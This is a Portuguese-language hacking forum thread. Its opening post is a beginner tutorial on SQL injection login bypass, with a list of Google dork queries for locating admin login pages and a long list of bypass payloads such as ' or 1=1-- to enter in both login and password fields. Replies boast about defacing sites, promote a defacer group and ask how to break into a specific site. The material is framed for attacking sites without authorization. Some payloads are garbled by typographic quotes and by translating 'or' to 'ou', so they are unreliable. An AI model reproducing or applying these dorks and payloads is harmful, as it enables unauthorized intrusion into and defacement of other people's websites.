Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

SQL Injection Iniciante

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Tutorial SQL Injection Iniciante

    SQL injection - método de inserção de strings no banco de dados do servidor - podendo assim liberar os cookies e conseqüentemente a permissão de administrador.
    Bem devido a alguns erros em banco de dados dos servidores é possível, ainda hoje, encontrar esse tipo devulnerabilidade.SQL Injection vem de injeção de SQL através de strings em campos de login ou senha, depedendo da página vulnerável. Um aliado para descobrir sites com essa vulnerabilidade é o famoso Google que permite pesquisar por páginas visadas a campos de logins
    isso nao significa que essas paginas já estejam vulneraveis ok.
    para pesquisarmos no google precisamo de um comando chamado allinurl.
    esse comando procura especificadamente aquilo que se vem depois dos dois pontos
    exemplo: allinurl:/site/admin/
    com esse codigo ele caçará paginas com campos de logins de adiministraçoes.
    abaixo uma lista com algums codigos para vc pesquisar no google.


    # Strings:

    allinurl:/webadmin/default.asp
    allinurl:/menu_admin/default.asp
    allinurl:/menu_admin/index.asp
    allinurl:/menu_admin/login.asp
    allinurl:/noticias/admin/
    allinurl:/news/admin/
    allinurl:/cadastro/admin/
    allinurl:/portal/admin/
    allinurl:/site/admin/
    allinurl:/home/admin.asp
    allinurl:/home/admin/index.asp
    allinurl:/home/admin/default.asp
    allinurl:/home/admin/login.asp
    allinurl:/web/admin/index.asp
    após isso saira uma lista de sites com paginas com campos de logins e senhas.

    Agora é só testarmos strings nos campos de logins das paginas de admin.
    a mesma string usada no login deve ser usada no campo de senha.

    abaixo uma lista de strings:


    b’ or ‘ 1=’
    ‘ or ‘1
    ‘ or ‘|
    ‘ or ‘a’='a
    ‘ or ”=’
    ‘ or 1=1–
    ‘) or (’a'=’a
    ‘ or ‘1'=’1
    admin ‘ - -
    ‘ ou 0=0 –
    “ou 0=0 –
    ou 0=0 –
    ‘ ou 0=0 #
    “ou 0=0 #
    ou 0=0 #
    ‘ ou ‘ x’='x
    “ou” x”=”x
    ‘) ou (’ x’='x
    ‘ ou 1=1 –
    “ou 1=1 –
    ou 1=1 –
    ‘ ou a=a –
    “ou” a”=”a
    ‘) ou (’ a’='a
    “) ou (”a”=”a
    hi “ou” a”=”a
    hi “ou 1=1 –
    hi ‘ ou 1=1 –
    hi ‘ ou ‘ a’='a
    hi ‘) ou (’ a’='a
    hi”) ou (”a”=”a
    ‘ or ‘x’='x

    teste varias strings ate acertar uma que de uma confusao no banco de dados do servidor
    assim te dando acesso a pagina da adiministração.
    Last edited by bolinhaxp; 08-12-2009, 12:50.

  • Font Size
    #2
    Creditos # 0wn3r

    Comment


    • Font Size
      #3
      eh melhor deixar sem creditos ,
      pq esse #0wn3r ai pega tuto de um monte de lugar
      e nem sabe o creditos!!!!

      Comment


      • Font Size
        #4
        Da onde eu peguei nao tinha nenhum # 0wn3r =/

        Comment


        • Font Size
          #5
          coloca os creditos do # 0wn3r
          ele postou primeiro la no fh ^^

          Comment


          • Font Size
            #6
            Só nao sei aonde está o super neste tópico .
            Estou vend um tópico de sqli basico "normal"...
            abraço !
            Nao Participa ainda ?
            * Comunidade Elite Defacer


            Elite Defacer
            Hackeralp - 5ubZer0 - $cr34m()

            Comment


            • Font Size
              #7
              Estão de brincadeira ?
              Meu deus, quem vai querer credito de um tópico desses ? ¬¬
              Mesmo assim, valeu.

              Comment


              • Font Size
                #8
                Postado Originalmente por Lucky
                Affz,Aonde eu peguei o Topico,o cara falo que nem era dele os creditos e ele nem sabia de quem era.
                E Se quiser Bani,Pode Bani

                Créditos: Indisponível

                ---
                Mesmo longe, eu estou perto. Guia do Hacker 4ever.

                Comment


                • Font Size
                  #9
                  kkkkkkkkkk is ai e pra me mtar de rir


                  mateiriasi exclusivos

                  Comment


                  • Font Size
                    #10
                    tendo creditos pro # 0wn3r ou não
                    isso ai eh muito dificil funfar os sites vuneraveis há isso estão praticamente em extinção .rsrs

                    Flws..zZ'

                    Comment


                    • Font Size
                      #11
                      mas ainda existe... kkk...

                      Comment


                      • Font Size
                        #12
                        nesses meus 12 anos de vida eu nunca consegui ownar nenhum site com esse metodo

                        Comment


                        • Font Size
                          #13
                          Postado Originalmente por M47r1x Ver Post
                          nesses meus 12 anos de vida eu nunca consegui ownar nenhum site com esse metodo
                          Quando começei a entrar na area de defacer, consegui ownar uns 15 sites assim xD

                          Comment


                          • Font Size
                            #14
                            o.o
                            vc é o cara

                            Comment


                            • Font Size
                              #15
                              ai man
                              tentei os codigos neste site
                              Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
                              e naum deu em nada
                              como faço para invadi este site ?

                              Comment

                              X
                              Working...
                              X